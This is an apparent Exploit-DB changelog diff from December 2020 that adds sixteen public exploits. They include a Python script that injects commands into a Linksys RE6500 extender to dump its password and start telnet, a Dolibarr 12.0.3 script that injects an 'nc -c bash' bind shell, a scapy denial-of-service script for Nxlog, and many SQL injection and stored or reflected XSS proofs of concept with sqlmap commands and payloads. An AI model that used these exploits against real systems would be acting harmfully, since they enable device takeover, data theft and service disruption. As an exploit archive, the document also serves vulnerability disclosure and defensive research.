DB: 2020-12-18

16 changes to exploits/shellcodes

Nxlog Community Edition 2.10.2150 - DoS (Poc)
Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
Linksys RE6500 1.0.11.001 - Unauthenticated RCE
Content Management System 1.0 - 'First Name' Stored XSS
Content Management System 1.0 - 'email' SQL Injection
Content Management System 1.0 - 'id' SQL Injection
Medical Center Portal Management System 1.0 - 'id' SQL Injection
Customer Support System 1.0 - _First Name_ & _Last Name_ Stored XSS
Customer Support System 1.0 - 'id' SQL Injection
Online Tours & Travels Management System 1.0 - _id_ SQL Injection
Interview Management System 1.0 - Stored XSS in Add New Question
Interview Management System 1.0 - 'id' SQL Injection
Employee Record System 1.0 - Multiple Stored XSS
PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)
Victor CMS 1.0 - Multiple SQL Injection (Authenticated)

exploits/hardware/webapps/49270.py

@@ -0,0 +1,54 @@
+# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
+# Date: 31/07/2020
+# Exploit Author: RE-Solver
+# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
+# Vendor Homepage: www.linksys.com
+# Version:  FW V1.05 up to FW v1.0.11.001
+# Tested on: FW V1.05 up to FW v1.0.11.001
+# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
+# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. 
+# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. 
+
+#!/usr/bin/env python
+
+from requests import Session
+import requests
+import os
+print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
+print("Tested on FW V1.05 up to FW v1.0.11.001")
+print("RE-Solver @solver_re")
+ip="192.168.1.226"
+
+command="nvram_get Password >/tmp/lastpwd"
+#save device password;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r= s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Prev password saved in /tmp/lastpwd")
+
+command="busybox telnetd"
+#start telnetd;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Telnet Enabled")
+
+#set admin password
+post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Prevent corrupting nvram - set a new password= admin")

exploits/multiple/dos/49283.txt

@@ -0,0 +1,46 @@
+# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc)
+# Date: 15/12/2020
+# Exploit Author: Guillaume PETIT
+# Vendor Homepage: https://nxlog.co
+# Software Link: https://nxlog.co/products/nxlog-community-edition/download
+# Version: 2.10.2150
+# Tested on: Linux Debian 10 && Windows Server 2019
+
+#!/usr/bin/python3
+
+import sys
+import time
+import argparse
+from scapy.all import *
+
+def getPayload(args):
+        # IF UNIX
+        if (args.OS == 1):
+                return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"
+        # IF WINDOWS
+        elif (args.OS == 2):
+                return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"
+
+        # Test
+        elif (args.OS == 3):
+                return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"
+
+def runExploit(args,payload):
+        priority = 30
+        message = payload
+        syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message)
+        send(syslog,verbose=args.DEBUG)
+
+def getArguments():
+        parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")
+        parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server")
+        parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514")
+        parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test")
+        parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable")
+        return parser.parse_args()
+
+def main():
+        args = getArguments()
+        payload = getPayload(args)
+        runExploit(args,payload)
+main()

exploits/php/webapps/49209.txt

@@ -5,6 +5,7 @@
 # Tested on: Windows 10
 # Web Browser: Mozilla Firefox & Opera
 # Google Dorks: "Powered by vBulletin® Version 5.6.3"
+# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html
 
 Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
 Choose "Denim" or other theme and choose action "Add new template" and

exploits/php/webapps/49269.py

@@ -0,0 +1,77 @@
+# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
+# Date: 2020.12.17
+# Exploit Author: Yilmaz Degirmenci
+# Vendor Homepage: https://github.com/Dolibarr/dolibarr
+# Software Link: https://sourceforge.net/projects/dolibarr/
+# Version: 12.0.3
+# Tested on: Kali Linux 2020.2
+
+# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is
+# vulnerable to authenticated Remote Code Execution Attack. An attacker who
+# has the access the admin dashboard can manipulate the backup function by
+# inserting payload into the zipfilename_template parameter at page
+# /admin/tools/dolibarr_export.php by clicking on the button "Generate
+# Backup" thus triggering command injection on target system.
+
+import requests
+from bs4 import BeautifulSoup
+from bs4 import Comment
+import re
+import lxml
+import json
+import urllib
+
+username = input("username: ")
+password = input("password: ")
+root_url = input("Root URL: http://192.168.0.15/ --> ")
+
+print("Exploit is sent! Check out if the bind shell on port 9999 active!")
+
+listener_port = "9999"
+
+login_url = root_url + "/index.php?mainmenu=home "
+vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
+upload_url = root_url + "/admin/tools/export_files.php"
+
+session = requests.Session()
+request = session.get(login_url)
+
+# Get the token value
+soup = BeautifulSoup(request.text,"lxml")
+token = soup.find("input",{'name':'token'})['value']
+
+# Login
+body = {"token":token, "actionlogin":"login",
+"loginfunction":"loginfunction", "tz":"-5",
+"tz_string":"America%2FNew_York", "dst_observed":"1",
+"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second":
+"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664",
+"dol_hide_topmenu":"", "dol_hide_leftmenu":"",
+"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"",
+"dol_use_jmobile":"", "username":username,"password":password}
+
+session.post(login_url, data=body, cookies=request.cookies)
+
+request = session.get(vulnerable_url)
+token = soup.find("input",{'name':'token'})['value']
+
+header = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0",
+"Accept":"*/",
+"Accept-Encoding": "gzip, deflate",
+"Origin": root_url,
+"Referer":
+root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
+"Upgrade-Insecure-Requests": "1"
+}
+
+body = {"token":token, "export_type":"server", "page_y":"1039",
+"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar
+--use-compress-program='nc -c bash -nlvp  9999' %0a  :: ",
+"compression":"gz"}
+
+param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)
+
+session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)

exploits/php/webapps/49271.txt

@@ -0,0 +1,14 @@
+# Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: WINDOWS 10
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Rename the user First Name to
+"<script>alert(document.domain)</script>".
+Step 4: Update Profile and this will trigger the XSS.
+Step 5: Logout and login again and the page will display the domain name.

exploits/php/webapps/49272.txt

@@ -0,0 +1,50 @@
+# Exploit Title: Content Management System 1.0 - 'email' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login"
+page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=login HTTP/1.1
+Host: 10.211.55.4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 61
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://10.211.55.4
+Referer: http://10.211.55.4/login.php
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123
+---
+
+SQLMAP
+---
+Parameter: email (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND
+'WlxU'='WlxU&password=admin123
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM
+(SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123
+---

exploits/php/webapps/49273.txt

@@ -0,0 +1,58 @@
+# Exploit Title: Content Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "
+http://127.0.0.1/ajax.php?action=load_list" page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=load_list HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 63
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://127.0.0.1
+Referer:
+http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0
+---
+
+SQLMAP
+---
+Parameter: id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689
+AND 'ZPQO'='ZPQO&start=0
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT
+6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL
+SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL--
+-&start=0
+---

exploits/php/webapps/49274.txt

@@ -0,0 +1,52 @@
+# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Select Staff and select the view icon.
+
+Step 3. You will be redirected to a page like "
+http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any
+page that has the "id" parameter. Capture the current page request in
+burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE
+(SELECT 4035 UNION SELECT 6415) END))
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT
+COUNT(*),CONCAT(0x716b6a7871,(SELECT
+(ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: action=edit & id=22 AND (SELECT 4861 FROM
+(SELECT(SLEEP(5)))xiXm)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: action=edit & id=22 UNION ALL SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL--
+-
+---

exploits/php/webapps/49275.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any valid credentials
+
+Step 2. Click on the username in header and select "Manage Account".
+
+Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields.
+
+Step 4. Complete the other required details and click on save to update user information.
+
+Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered

exploits/php/webapps/49276.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on Customer and select list.
+
+Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: page=edit_staff&id=1 AND 4164=4164
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
+---

exploits/php/webapps/49277.txt

@@ -0,0 +1,74 @@
+# Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Bookings" in header and select "Add Bookings".
+
+Step 3. Complete the required details and click on "Save" to save the new Bookings.
+
+Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon.
+
+Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite.
+
+Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 7. This will inject successfully and you will have an information disclosure of all databases contents.
+
+---
+
+Parameter: id (GET)
+
+    Type: boolean-based blind
+
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+
+    Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg
+
+
+
+    Type: error-based
+
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+   
+ Payload: id=2' AND (SELECT 7113 FROM(SELECT 
+COUNT(*),CONCAT(0x716a626a71,(SELECT 
+(ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM 
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP
+
+
+
+    Type: stacked queries
+
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+
+    Payload: id=2';SELECT SLEEP(5)#
+
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq
+
+
+
+    Type: UNION query
+
+    Title: MySQL UNION query (NULL) - 4 columns
+
+   
+ Payload: id=-1072' UNION ALL SELECT 
+NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL#
+
+---

exploits/php/webapps/49278.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add New Question Page.
+
+Step 3: input "<script>alert(document.cookie)</script>" in the new question
+field and select add new question.
+
+Step 4: Once you have an XSS payload as a question in add new question
+page, click on View Questions Page.
+
+Step 5: This will trigger the XSS payload.

exploits/php/webapps/49279.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Click on View Candidates page and select take exam. If there is no
+candidate, click on "Add New Candidate" page, fill details and add new
+candidate.
+
+Step 3. Click on "Take Exam" and capture the request in burpsuite.
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980
+UNION SELECT 3372) END))
+
+    Type: stacked queries
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+    Payload: id=1;SELECT SLEEP(5)#
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
+---

exploits/php/webapps/49280.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Employee Record System 1.0 - Multiple Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add Employee.
+
+Step 3: input "<script>alert(1)</script>" in all fields except phone number
+fields. Note: increase the values of "1" in "alert(1)" to determine which
+field is vulnerable. Eg <script>alert(2)</script>,
+<script>alert(3)</script> ....etc.
+
+Step 4: Once all fields are completed, Click on ADD RECORD to save the
+record.
+
+Step 5: Click on All Employees page and this will trigger the Stored XSS.
+
+Step 6: To view all Stored XSS, after clicking on All Employees page, click
+on the View Employee Icon. This will tigger all Stored XSS payloads.

exploits/php/webapps/49281.txt

@@ -0,0 +1,52 @@
+# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)
+# Date: 2020-12-14
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.phpjabbers.com
+# Software Link: https://www.phpjabbers.com/appointment-scheduler
+# Version: 2.3
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)
+# CVE: CVE-2020-35416
+
+Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.
+
+Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.
+
+PoC Request:
+GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1
+Host: [removed]
+Connection: close
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://[removed]
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422
+
+PoC Response:
+HTTP/1.1 200 OK
+Server: nginx
+Date: Thu, 14 Dec 2020 10:48:41 GMT
+Content-Type: text/html; charset=utf-8
+Connection: close
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+Access-Control-Allow-Methods: POST, GET, OPTIONS
+Access-Control-Allow-Headers: Origin, X-Requested-With
+Content-Length: 13988
+
+<div class="container-fluid">
+   <div class="row">
+       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">
+           <div class="panel panel-default pjAsContainer pjAsAside">
+               <div class="panel-heading p
+...[SNIP]...
+<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>
+...[SNIP]...

exploits/php/webapps/49282.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated)
+# Date: 17.12.2020
+# Exploit Author: Furkan Göksel
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+# Description: The Victor CMS v1.0 application is vulnerable to SQL
+# injection in c_id parameter of admin_edit_comment.php, p_id parameter
+# of admin_edit_post.php, u_id parameter of admin_edit_user.php, edit
+# parameter of admin_update_categories.php.
+
+# Tested on: Apache2/Linux
+
+Step 1: Register the system through main page and login your account
+
+Step 2: After successful login, select one of the specified tabs
+(post, categories, comments, users)
+
+Step 3: When you click edit button of these records, an HTTP request
+is sent to server to get details of this record with corresponding
+parameters (eg. for edit comment it is c_id parameter)
+
+Step 4: Inject your SQL payload to these ids or use sqlmap to dump
+
+Example PoC request is as follows:
+
+GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1
+
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66
+Upgrade-Insecure-Requests: 1
+
+Same PoC payload is valid for all edit features of specified tabs.

files_exploits.csv

@@ -6765,6 +6765,7 @@ id,file,description,date,author,type,platform,port
 49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
 49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
+49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -43487,3 +43488,17 @@ id,file,description,date,author,type,platform,port
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
